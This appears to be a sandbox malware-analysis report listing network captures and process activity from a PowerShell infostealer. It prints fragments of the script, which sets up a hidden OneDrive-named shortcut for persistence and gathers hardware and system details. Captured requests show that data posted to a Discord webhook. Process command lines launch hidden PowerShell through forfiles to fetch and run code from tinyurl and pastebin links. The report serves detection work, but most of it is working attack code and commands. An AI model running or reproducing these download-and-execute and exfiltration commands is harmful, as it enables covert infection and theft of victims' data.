                                                                              2024-10-15 13:54:02 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                              Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                              2024-10-15 13:54:02 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                              Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                              2024-10-15 13:54:02 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                              Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                              2024-10-15 13:54:02 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                              Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                              2024-10-15 13:54:02 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                              Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                              2024-10-15 13:54:02 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                              Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.1049720162.159.137.2324432040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-15 13:54:07 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                              Content-Type: application/json
                                                                              Host: discord.com
                                                                              Content-Length: 294
                                                                              Connection: Keep-Alive
                                                                              2024-10-15 13:54:07 UTC294OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 62 72 6f 6b 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 56 45 4e 55 47 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20 46 41 4c 53
                                                                              Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** VENUG\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC - FALS
                                                                              2024-10-15 13:54:08 UTC1350INHTTP/1.1 204 No Content
                                                                              Date: Tue, 15 Oct 2024 13:54:08 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              set-cookie: __dcfduid=f2c19d768afc11ef8fadaa6d64cdf669; Expires=Sun, 14-Oct-2029 13:54:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                              x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                              x-ratelimit-limit: 5
                                                                              x-ratelimit-remaining: 3
                                                                              x-ratelimit-reset: 1729000449
                                                                              x-ratelimit-reset-after: 1
                                                                              via: 1.1 google
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1CJ2wNgr2f6k8cyC0VmhTn%2FTTMCpxuxtNDgUAblaK4FDGPfXweccRKfQvoWMNZ8V24IaY00JWhuV7uZHIAGdhE0cWevKDxT1mPiXBWdm6Ay1U4tumue78LdH7kFy"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              X-Content-Type-Options: nosniff
                                                                              Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                              Set-Cookie: __sdcfduid=f2c19d768afc11ef8fadaa6d64cdf6696ba1b1207af5499aa0b40bb51ffe05cc731a6ac88dcbad2a33b7e64ffadc07da; Expires=Sun, 14-Oct-2029 13:54:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                              Set-Cookie: __cfruid=5c6b0a66b89033257b144fd7b0c8cf669f14427e-1729000448; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                              2024-10-15 13:54:08 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 44 4f 59 6f 35 6a 51 66 51 62 51 35 4d 73 79 44 39 39 48 71 75 30 78 33 36 47 58 46 73 6d 36 2e 6d 6c 6f 66 50 52 62 43 57 4c 4d 2d 31 37 32 39 30 30 30 34 34 38 31 31 33 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 33 30 34 63 39 66 38 63 39 39 36 62 62 30 2d 44 46 57 0d 0a 0d 0a
                                                                              Data Ascii: Set-Cookie: _cfuvid=DOYo5jQfQbQ5MsyD99Hqu0x36GXFsm6.mlofPRbCWLM-1729000448113-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d304c9f8c996bb0-DFW


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              8192.168.2.1049722162.159.137.2324435024C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-15 13:54:16 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                              Content-Type: application/json
                                                                              Host: discord.com
                                                                              Content-Length: 294
                                                                              Connection: Keep-Alive
                                                                              2024-10-15 13:54:16 UTC294OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 62 72 6f 6b 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 56 45 4e 55 47 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20 46 41 4c 53
                                                                              Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** VENUG\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC - FALS
                                                                              2024-10-15 13:54:16 UTC1360INHTTP/1.1 204 No Content
                                                                              Date: Tue, 15 Oct 2024 13:54:16 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              set-cookie: __dcfduid=f7a342ea8afc11ef8fb196b35c36c75f; Expires=Sun, 14-Oct-2029 13:54:16 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                              x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                              x-ratelimit-limit: 5
                                                                              x-ratelimit-remaining: 4
                                                                              x-ratelimit-reset: 1729000457
                                                                              x-ratelimit-reset-after: 1
                                                                              via: 1.1 google
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7A%2BTR2QhD16hCmuoealGoXg35osTO3ScXyiCV5lCODesRF0qqrYcPC1M5fDvb9BhImHfZMvZOztKHNrujhxf%2FjB4emMFn%2FxNCE3tyii%2BnPc4oFoZEv0%2BHC0dFPJ%2F"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              X-Content-Type-Options: nosniff
                                                                              Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                              Set-Cookie: __sdcfduid=f7a342ea8afc11ef8fb196b35c36c75f9b260d0397ccceb6c7d70b104626c69e73ffebce3095c2ca65d76c73cc2180ee; Expires=Sun, 14-Oct-2029 13:54:16 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                              Set-Cookie: __cfruid=e3e5a909a52a1b7622574e260c8ab779dc32bd45-1729000456; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                              2024-10-15 13:54:16 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 45 66 38 4a 70 77 30 70 61 78 59 72 6e 75 35 78 4b 4a 4a 68 51 65 74 65 7a 59 65 45 6a 35 59 56 74 4c 63 75 78 39 77 63 74 55 45 2d 31 37 32 39 30 30 30 34 35 36 33 30 38 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 33 30 34 63 64 32 65 38 62 36 65 37 65 33 2d 44 46 57 0d 0a 0d 0a
                                                                              Data Ascii: Set-Cookie: _cfuvid=Ef8Jpw0paxYrnu5xKJJhQetezYeEj5YVtLcux9wctUE-1729000456308-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d304cd2e8b6e7e3-DFW


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:1
                                                                              Start time:09:53:19
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\forfiles.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)'"
                                                                              Imagebase:0x7ff694540000
                                                                              File size:52'224 bytes
                                                                              MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:2
                                                                              Start time:09:53:19
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff620390000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:3
                                                                              Start time:09:53:20
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)'
                                                                              Imagebase:0x7ff7b2bb0000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:4
                                                                              Start time:09:53:22
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)"
                                                                              Imagebase:0x7ff7b2bb0000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:7
                                                                              Start time:09:53:46
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\attrib.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                              Imagebase:0x7ff66f790000
                                                                              File size:23'040 bytes
                                                                              MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:8
                                                                              Start time:09:53:48
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\forfiles.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                              Imagebase:0x7ff694540000
                                                                              File size:52'224 bytes
                                                                              MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:9
                                                                              Start time:09:53:48
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff620390000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:10
                                                                              Start time:09:53:49
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                              Imagebase:0x7ff7b2bb0000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:11
                                                                              Start time:09:53:49
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                              Imagebase:0x7ff7b2bb0000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:12
                                                                              Start time:09:53:56
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\forfiles.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                              Imagebase:0x7ff694540000
                                                                              File size:52'224 bytes
                                                                              MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:13
                                                                              Start time:09:53:57
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff620390000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:14
                                                                              Start time:09:53:57
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                              Imagebase:0x7ff7b2bb0000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:15
                                                                              Start time:09:53:57
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                              Imagebase:0x7ff7b2bb0000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Disassembly

                                                                              Reset < >
